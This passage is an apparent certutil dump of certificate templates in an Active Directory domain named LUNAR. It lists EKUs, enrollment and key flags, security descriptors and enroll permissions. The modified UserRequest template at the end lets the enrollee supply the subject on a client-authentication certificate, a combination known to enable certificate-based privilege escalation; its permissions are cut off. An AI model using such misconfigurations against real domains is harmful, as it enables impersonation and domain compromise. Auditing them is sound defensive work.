  1390. 1.3.6.1.5.5.7.3.1 Server Authentication
  1391. TemplatePropEnrollmentFlags = 20 (32)
  1392. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  1393. TemplatePropSubjectNameFlags = 48000000 (1207959552)
  1394. CT_FLAG_SUBJECT_ALT_REQUIRE_DNS -- 8000000 (134217728)
  1395. CT_FLAG_SUBJECT_REQUIRE_COMMON_NAME -- 40000000 (1073741824)
  1396. TemplatePropPrivateKeyFlags = 0
  1397. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  1398. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  1399. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  1400. TemplatePropGeneralFlags = 10260 (66144)
  1401. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  1402. CT_FLAG_MACHINE_TYPE -- 40 (64)
  1403. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  1404. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  1405. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;RS)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  1406. Allow Enroll LUNAR\Domain Admins
  1407. Allow Enroll LUNAR\Enterprise Admins
  1408. Allow Enroll LUNAR\RAS and IAS Servers
  1409. Allow Full Control LUNAR\Domain Admins
  1410. Allow Full Control LUNAR\Enterprise Admins
  1411. Allow Read NT AUTHORITY\Authenticated Users
  1412. TemplatePropExtensions =
  1413. 4 Extensions:
  1414. Extension[0]:
  1415. 1.3.6.1.4.1.311.21.7: Flags = 0, Length = 2b
  1416. Certificate Template Information
  1417. Template=RAS and IAS Server(1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.31)
  1418. Major Version Number=101
  1419. Minor Version Number=0
  1420. Extension[1]:
  1421. 2.5.29.37: Flags = 0, Length = 16
  1422. Enhanced Key Usage
  1423. Client Authentication (1.3.6.1.5.5.7.3.2)
  1424. Server Authentication (1.3.6.1.5.5.7.3.1)
  1425. Extension[2]:
  1426. 2.5.29.15: Flags = 1(Critical), Length = 4
  1427. Key Usage
  1428. Digital Signature, Key Encipherment (a0)
  1429. Extension[3]:
  1430. 1.3.6.1.4.1.311.21.10: Flags = 0, Length = 1a
  1431. Application Policies
  1432. [1]Application Certificate Policy:
  1433. Policy Identifier=Client Authentication
  1434. [2]Application Certificate Policy:
  1435. Policy Identifier=Server Authentication
  1436. TemplatePropValidityPeriod = 1 Years
  1437. TemplatePropRenewalPeriod = 6 Weeks
  1438. Template[24]:
  1439. TemplatePropCommonName = CA
  1440. TemplatePropFriendlyName = Root Certification Authority
  1441. TemplatePropCryptoProviders =
  1442. 0: Microsoft Enhanced Cryptographic Provider v1.0
  1443. TemplatePropMajorRevision = 5
  1444. TemplatePropDescription = Certification authority (CA)
  1445. TemplatePropSchemaVersion = 1
  1446. TemplatePropMinorRevision = 1
  1447. TemplatePropRASignatureCount = 0
  1448. TemplatePropMinimumKeySize = 800 (2048)
  1449. TemplatePropOID =
  1450. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.17
  1451. TemplatePropEnrollmentFlags = 0
  1452. TemplatePropSubjectNameFlags = 1
  1453. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  1454. TemplatePropPrivateKeyFlags = 10 (16)
  1455. CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)
  1456. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  1457. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  1458. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  1459. TemplatePropGeneralFlags = 100d1 (65745)
  1460. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  1461. CT_FLAG_EXPORTABLE_KEY -- 10 (16)
  1462. CT_FLAG_MACHINE_TYPE -- 40 (64)
  1463. CT_FLAG_IS_CA -- 80 (128)
  1464. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  1465. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  1466. Allow Enroll LUNAR\Domain Admins
  1467. Allow Enroll LUNAR\Enterprise Admins
  1468. Allow Full Control LUNAR\Domain Admins
  1469. Allow Full Control LUNAR\Enterprise Admins
  1470. Allow Read NT AUTHORITY\Authenticated Users
  1471. TemplatePropExtensions =
  1472. 3 Extensions:
  1473. Extension[0]:
  1474. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 6
  1475. Certificate Template Name (Certificate Type)
  1476. CA
  1477. Extension[1]:
  1478. 2.5.29.15: Flags = 1(Critical), Length = 4
  1479. Key Usage
  1480. Digital Signature, Certificate Signing, Off-line CRL Signing, CRL Signing (86)
  1481. Extension[2]:
  1482. 2.5.29.19: Flags = 1(Critical), Length = 5
  1483. Basic Constraints
  1484. Subject Type=CA
  1485. Path Length Constraint=None
  1486. TemplatePropValidityPeriod = 5 Years
  1487. TemplatePropRenewalPeriod = 6 Weeks
  1488. Template[25]:
  1489. TemplatePropCommonName = OfflineRouter
  1490. TemplatePropFriendlyName = Router (Offline request)
  1491. TemplatePropEKUs =
  1492. 1 ObjectIds:
  1493. 1.3.6.1.5.5.7.3.2 Client Authentication
  1494. TemplatePropCryptoProviders =
  1495. 0: Microsoft RSA SChannel Cryptographic Provider
  1496. TemplatePropMajorRevision = 4
  1497. TemplatePropDescription = Computer
  1498. TemplatePropSchemaVersion = 1
  1499. TemplatePropMinorRevision = 1
  1500. TemplatePropRASignatureCount = 0
  1501. TemplatePropMinimumKeySize = 800 (2048)
  1502. TemplatePropOID =
  1503. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.21
  1504. TemplatePropEnrollmentFlags = 0
  1505. TemplatePropSubjectNameFlags = 1
  1506. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  1507. TemplatePropPrivateKeyFlags = 0
  1508. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  1509. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  1510. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  1511. TemplatePropGeneralFlags = 10241 (66113)
  1512. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  1513. CT_FLAG_MACHINE_TYPE -- 40 (64)
  1514. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  1515. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  1516. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  1517. Allow Enroll LUNAR\Domain Admins
  1518. Allow Enroll LUNAR\Enterprise Admins
  1519. Allow Full Control LUNAR\Domain Admins
  1520. Allow Full Control LUNAR\Enterprise Admins
  1521. Allow Read NT AUTHORITY\Authenticated Users
  1522. TemplatePropExtensions =
  1523. 3 Extensions:
  1524. Extension[0]:
  1525. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 1c
  1526. Certificate Template Name (Certificate Type)
  1527. OfflineRouter
  1528. Extension[1]:
  1529. 2.5.29.37: Flags = 0, Length = c
  1530. Enhanced Key Usage
  1531. Client Authentication (1.3.6.1.5.5.7.3.2)
  1532. Extension[2]:
  1533. 2.5.29.15: Flags = 1(Critical), Length = 4
  1534. Key Usage
  1535. Digital Signature, Key Encipherment (a0)
  1536. TemplatePropValidityPeriod = 2 Years
  1537. TemplatePropRenewalPeriod = 6 Weeks
  1538. Template[26]:
  1539. TemplatePropCommonName = SmartcardLogon
  1540. TemplatePropFriendlyName = Smartcard Logon
  1541. TemplatePropEKUs =
  1542. 2 ObjectIds:
  1543. 1.3.6.1.5.5.7.3.2 Client Authentication
  1544. 1.3.6.1.4.1.311.20.2.2 Smart Card Logon
  1545. TemplatePropMajorRevision = 6
  1546. TemplatePropDescription = User
  1547. TemplatePropSchemaVersion = 1
  1548. TemplatePropMinorRevision = 1
  1549. TemplatePropRASignatureCount = 0
  1550. TemplatePropMinimumKeySize = 800 (2048)
  1551. TemplatePropOID =
  1552. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.5
  1553. TemplatePropEnrollmentFlags = 0
  1554. TemplatePropSubjectNameFlags = 82000000 (-2113929216)
  1555. CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)
  1556. CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)
  1557. TemplatePropPrivateKeyFlags = 0
  1558. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  1559. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  1560. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  1561. TemplatePropGeneralFlags = 10200 (66048)
  1562. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  1563. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  1564. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  1565. Allow Enroll LUNAR\Domain Admins
  1566. Allow Enroll LUNAR\Enterprise Admins
  1567. Allow Full Control LUNAR\Domain Admins
  1568. Allow Full Control LUNAR\Enterprise Admins
  1569. Allow Read NT AUTHORITY\Authenticated Users
  1570. TemplatePropExtensions =
  1571. 3 Extensions:
  1572. Extension[0]:
  1573. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 1e
  1574. Certificate Template Name (Certificate Type)
  1575. SmartcardLogon
  1576. Extension[1]:
  1577. 2.5.29.37: Flags = 0, Length = 18
  1578. Enhanced Key Usage
  1579. Client Authentication (1.3.6.1.5.5.7.3.2)
  1580. Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
  1581. Extension[2]:
  1582. 2.5.29.15: Flags = 1(Critical), Length = 4
  1583. Key Usage
  1584. Digital Signature, Key Encipherment (a0)
  1585. TemplatePropValidityPeriod = 1 Years
  1586. TemplatePropRenewalPeriod = 6 Weeks
  1587. Template[27]:
  1588. TemplatePropCommonName = SmartcardUser
  1589. TemplatePropFriendlyName = Smartcard User
  1590. TemplatePropEKUs =
  1591. 3 ObjectIds:
  1592. 1.3.6.1.5.5.7.3.4 Secure Email
  1593. 1.3.6.1.5.5.7.3.2 Client Authentication
  1594. 1.3.6.1.4.1.311.20.2.2 Smart Card Logon
  1595. TemplatePropMajorRevision = b (11)
  1596. TemplatePropDescription = User
  1597. TemplatePropSchemaVersion = 1
  1598. TemplatePropMinorRevision = 1
  1599. TemplatePropRASignatureCount = 0
  1600. TemplatePropMinimumKeySize = 800 (2048)
  1601. TemplatePropOID =
  1602. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.3
  1603. TemplatePropEnrollmentFlags = 9
  1604. CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1
  1605. CT_FLAG_PUBLISH_TO_DS -- 8
  1606. TemplatePropSubjectNameFlags = a6000000 (-1509949440)
  1607. CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)
  1608. CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL -- 4000000 (67108864)
  1609. CT_FLAG_SUBJECT_REQUIRE_EMAIL -- 20000000 (536870912)
  1610. CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)
  1611. TemplatePropPrivateKeyFlags = 0
  1612. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  1613. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  1614. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  1615. TemplatePropGeneralFlags = 1020a (66058)
  1616. CT_FLAG_ADD_EMAIL -- 2
  1617. CT_FLAG_PUBLISH_TO_DS -- 8
  1618. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  1619. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  1620. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  1621. Allow Enroll LUNAR\Domain Admins
  1622. Allow Enroll LUNAR\Enterprise Admins
  1623. Allow Full Control LUNAR\Domain Admins
  1624. Allow Full Control LUNAR\Enterprise Admins
  1625. Allow Read NT AUTHORITY\Authenticated Users
  1626. TemplatePropExtensions =
  1627. 3 Extensions:
  1628. Extension[0]:
  1629. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 1c
  1630. Certificate Template Name (Certificate Type)
  1631. SmartcardUser
  1632. Extension[1]:
  1633. 2.5.29.37: Flags = 0, Length = 22
  1634. Enhanced Key Usage
  1635. Secure Email (1.3.6.1.5.5.7.3.4)
  1636. Client Authentication (1.3.6.1.5.5.7.3.2)
  1637. Smart Card Logon (1.3.6.1.4.1.311.20.2.2)
  1638. Extension[2]:
  1639. 2.5.29.15: Flags = 1(Critical), Length = 4
  1640. Key Usage
  1641. Digital Signature, Key Encipherment (a0)
  1642. TemplatePropValidityPeriod = 1 Years
  1643. TemplatePropRenewalPeriod = 6 Weeks
  1644. Template[28]:
  1645. TemplatePropCommonName = SubCA
  1646. TemplatePropFriendlyName = Subordinate Certification Authority
  1647. TemplatePropCryptoProviders =
  1648. 0: Microsoft Enhanced Cryptographic Provider v1.0
  1649. TemplatePropMajorRevision = 5
  1650. TemplatePropDescription = Certification authority (CA)
  1651. TemplatePropSchemaVersion = 1
  1652. TemplatePropMinorRevision = 1
  1653. TemplatePropRASignatureCount = 0
  1654. TemplatePropMinimumKeySize = 800 (2048)
  1655. TemplatePropOID =
  1656. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.18
  1657. TemplatePropEnrollmentFlags = 0
  1658. TemplatePropSubjectNameFlags = 1
  1659. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  1660. TemplatePropPrivateKeyFlags = 10 (16)
  1661. CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)
  1662. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  1663. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  1664. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  1665. TemplatePropGeneralFlags = 102d1 (66257)
  1666. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  1667. CT_FLAG_EXPORTABLE_KEY -- 10 (16)
  1668. CT_FLAG_MACHINE_TYPE -- 40 (64)
  1669. CT_FLAG_IS_CA -- 80 (128)
  1670. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  1671. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  1672. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  1673. Allow Enroll LUNAR\Domain Admins
  1674. Allow Enroll LUNAR\Enterprise Admins
  1675. Allow Full Control LUNAR\Domain Admins
  1676. Allow Full Control LUNAR\Enterprise Admins
  1677. Allow Read NT AUTHORITY\Authenticated Users
  1678. TemplatePropExtensions =
  1679. 3 Extensions:
  1680. Extension[0]:
  1681. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = c
  1682. Certificate Template Name (Certificate Type)
  1683. SubCA
  1684. Extension[1]:
  1685. 2.5.29.15: Flags = 1(Critical), Length = 4
  1686. Key Usage
  1687. Digital Signature, Certificate Signing, Off-line CRL Signing, CRL Signing (86)
  1688. Extension[2]:
  1689. 2.5.29.19: Flags = 1(Critical), Length = 5
  1690. Basic Constraints
  1691. Subject Type=CA
  1692. Path Length Constraint=None
  1693. TemplatePropValidityPeriod = 5 Years
  1694. TemplatePropRenewalPeriod = 6 Weeks
  1695. Template[29]:
  1696. TemplatePropCommonName = CTLSigning
  1697. TemplatePropFriendlyName = Trust List Signing
  1698. TemplatePropEKUs =
  1699. 1 ObjectIds:
  1700. 1.3.6.1.4.1.311.10.3.1 Microsoft Trust List Signing
  1701. TemplatePropCryptoProviders =
  1702. 0: Microsoft Enhanced Cryptographic Provider v1.0
  1703. 1: Microsoft Base Cryptographic Provider v1.0
  1704. 2: Microsoft Base DSS Cryptographic Provider
  1705. TemplatePropMajorRevision = 3
  1706. TemplatePropDescription = User
  1707. TemplatePropSchemaVersion = 1
  1708. TemplatePropMinorRevision = 1
  1709. TemplatePropRASignatureCount = 0
  1710. TemplatePropMinimumKeySize = 800 (2048)
  1711. TemplatePropOID =
  1712. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.10
  1713. TemplatePropEnrollmentFlags = 20 (32)
  1714. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  1715. TemplatePropSubjectNameFlags = 82000000 (-2113929216)
  1716. CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)
  1717. CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)
  1718. TemplatePropPrivateKeyFlags = 0
  1719. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  1720. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  1721. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  1722. TemplatePropGeneralFlags = 10220 (66080)
  1723. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  1724. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  1725. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  1726. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  1727. Allow Enroll LUNAR\Domain Admins
  1728. Allow Enroll LUNAR\Enterprise Admins
  1729. Allow Full Control LUNAR\Domain Admins
  1730. Allow Full Control LUNAR\Enterprise Admins
  1731. Allow Read NT AUTHORITY\Authenticated Users
  1732. TemplatePropExtensions =
  1733. 3 Extensions:
  1734. Extension[0]:
  1735. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = 16
  1736. Certificate Template Name (Certificate Type)
  1737. CTLSigning
  1738. Extension[1]:
  1739. 2.5.29.37: Flags = 0, Length = e
  1740. Enhanced Key Usage
  1741. Microsoft Trust List Signing (1.3.6.1.4.1.311.10.3.1)
  1742. Extension[2]:
  1743. 2.5.29.15: Flags = 1(Critical), Length = 4
  1744. Key Usage
  1745. Digital Signature (80)
  1746. TemplatePropValidityPeriod = 1 Years
  1747. TemplatePropRenewalPeriod = 6 Weeks
  1748. Template[30]:
  1749. TemplatePropCommonName = User
  1750. TemplatePropFriendlyName = User
  1751. TemplatePropEKUs =
  1752. 3 ObjectIds:
  1753. 1.3.6.1.4.1.311.10.3.4 Encrypting File System
  1754. 1.3.6.1.5.5.7.3.4 Secure Email
  1755. 1.3.6.1.5.5.7.3.2 Client Authentication
  1756. TemplatePropCryptoProviders =
  1757. 0: Microsoft Enhanced Cryptographic Provider v1.0
  1758. 1: Microsoft Base Cryptographic Provider v1.0
  1759. TemplatePropMajorRevision = 3
  1760. TemplatePropDescription = User
  1761. TemplatePropSchemaVersion = 1
  1762. TemplatePropMinorRevision = 1
  1763. TemplatePropRASignatureCount = 0
  1764. TemplatePropMinimumKeySize = 800 (2048)
  1765. TemplatePropOID =
  1766. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.1.1
  1767. TemplatePropEnrollmentFlags = 29 (41)
  1768. CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1
  1769. CT_FLAG_PUBLISH_TO_DS -- 8
  1770. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  1771. TemplatePropSubjectNameFlags = a6000000 (-1509949440)
  1772. CT_FLAG_SUBJECT_ALT_REQUIRE_UPN -- 2000000 (33554432)
  1773. CT_FLAG_SUBJECT_ALT_REQUIRE_EMAIL -- 4000000 (67108864)
  1774. CT_FLAG_SUBJECT_REQUIRE_EMAIL -- 20000000 (536870912)
  1775. CT_FLAG_SUBJECT_REQUIRE_DIRECTORY_PATH -- 80000000 (-2147483648)
  1776. TemplatePropPrivateKeyFlags = 10 (16)
  1777. CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)
  1778. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  1779. TEMPLATE_SERVER_VER_NONE<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 0
  1780. TEMPLATE_CLIENT_VER_NONE<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 0
  1781. TemplatePropGeneralFlags = 1023a (66106)
  1782. CT_FLAG_ADD_EMAIL -- 2
  1783. CT_FLAG_PUBLISH_TO_DS -- 8
  1784. CT_FLAG_EXPORTABLE_KEY -- 10 (16)
  1785. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  1786. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  1787. CT_FLAG_IS_DEFAULT -- 10000 (65536)
  1788. TemplatePropSecurityDescriptor = O:S-1-5-21-3330634377-1326264276-632209373-519G:S-1-5-21-3330634377-1326264276-632209373-519D:PAI(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DA)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;DU)(OA;;RPWPCR;0e10c968-78fb-11d2-90d4-00c04f79dc55;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;DA)(A;;CCDCLCSWRPWPDTLOSDRCWDWO;;;S-1-5-21-3330634377-1326264276-632209373-519)(A;;LCRPLORC;;;AU)
  1789. Allow Enroll LUNAR\Domain Admins
  1790. Allow Enroll LUNAR\Domain Users
  1791. Allow Enroll LUNAR\Enterprise Admins
  1792. Allow Full Control LUNAR\Domain Admins
  1793. Allow Full Control LUNAR\Enterprise Admins
  1794. Allow Read NT AUTHORITY\Authenticated Users
  1795. TemplatePropExtensions =
  1796. 3 Extensions:
  1797. Extension[0]:
  1798. 1.3.6.1.4.1.311.20.2: Flags = 0, Length = a
  1799. Certificate Template Name (Certificate Type)
  1800. User
  1801. Extension[1]:
  1802. 2.5.29.37: Flags = 0, Length = 22
  1803. Enhanced Key Usage
  1804. Encrypting File System (1.3.6.1.4.1.311.10.3.4)
  1805. Secure Email (1.3.6.1.5.5.7.3.4)
  1806. Client Authentication (1.3.6.1.5.5.7.3.2)
  1807. Extension[2]:
  1808. 2.5.29.15: Flags = 1(Critical), Length = 4
  1809. Key Usage
  1810. Digital Signature, Key Encipherment (a0)
  1811. TemplatePropValidityPeriod = 1 Years
  1812. TemplatePropRenewalPeriod = 6 Weeks
  1813. Template[31]:
  1814. TemplatePropCommonName = UserRequest
  1815. TemplatePropFriendlyName = User Request
  1816. TemplatePropEKUs =
  1817. 3 ObjectIds:
  1818. 1.3.6.1.5.5.7.3.2 Client Authentication
  1819. 1.3.6.1.5.5.7.3.4 Secure Email
  1820. 1.3.6.1.4.1.311.10.3.4 Encrypting File System
  1821. TemplatePropCryptoProviders =
  1822. 0: Microsoft Enhanced Cryptographic Provider v1.0
  1823. TemplatePropMajorRevision = 64 (100)
  1824. TemplatePropDescription = User
  1825. TemplatePropSchemaVersion = 2
  1826. TemplatePropMinorRevision = a (10)
  1827. TemplatePropRASignatureCount = 0
  1828. TemplatePropMinimumKeySize = 800 (2048)
  1829. TemplatePropOID =
  1830. 1.3.6.1.4.1.311.21.8.13251815.15344444.12602244.3735211.11040971.202.13950390.3651808 User Request
  1831. TemplatePropV1ApplicationPolicy =
  1832. 3 ObjectIds:
  1833. 1.3.6.1.5.5.7.3.2 Client Authentication
  1834. 1.3.6.1.5.5.7.3.4 Secure Email
  1835. 1.3.6.1.4.1.311.10.3.4 Encrypting File System
  1836. TemplatePropEnrollmentFlags = 19 (25)
  1837. CT_FLAG_INCLUDE_SYMMETRIC_ALGORITHMS -- 1
  1838. CT_FLAG_PUBLISH_TO_DS -- 8
  1839. CT_FLAG_AUTO_ENROLLMENT_CHECK_USER_DS_CERTIFICATE -- 10 (16)
  1840. TemplatePropSubjectNameFlags = 1
  1841. CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT -- 1
  1842. TemplatePropPrivateKeyFlags = 1010010 (16842768)
  1843. CTPRIVATEKEY_FLAG_EXPORTABLE_KEY -- 10 (16)
  1844. CTPRIVATEKEY_FLAG_ATTEST_NONE -- 0
  1845. TEMPLATE_SERVER_VER_2003<<CTPRIVATEKEY_FLAG_SERVERVERSION_SHIFT -- 10000 (65536)
  1846. TEMPLATE_CLIENT_VER_XP<<CTPRIVATEKEY_FLAG_CLIENTVERSION_SHIFT -- 1000000 (16777216)
  1847. TemplatePropGeneralFlags = 2023a (131642)
  1848. CT_FLAG_ADD_EMAIL -- 2
  1849. CT_FLAG_PUBLISH_TO_DS -- 8
  1850. CT_FLAG_EXPORTABLE_KEY -- 10 (16)
  1851. CT_FLAG_AUTO_ENROLLMENT -- 20 (32)
  1852. CT_FLAG_ADD_TEMPLATE_NAME -- 200 (512)
  1853. CT_FLAG_IS_MODIFIED -- 20000 (131072)
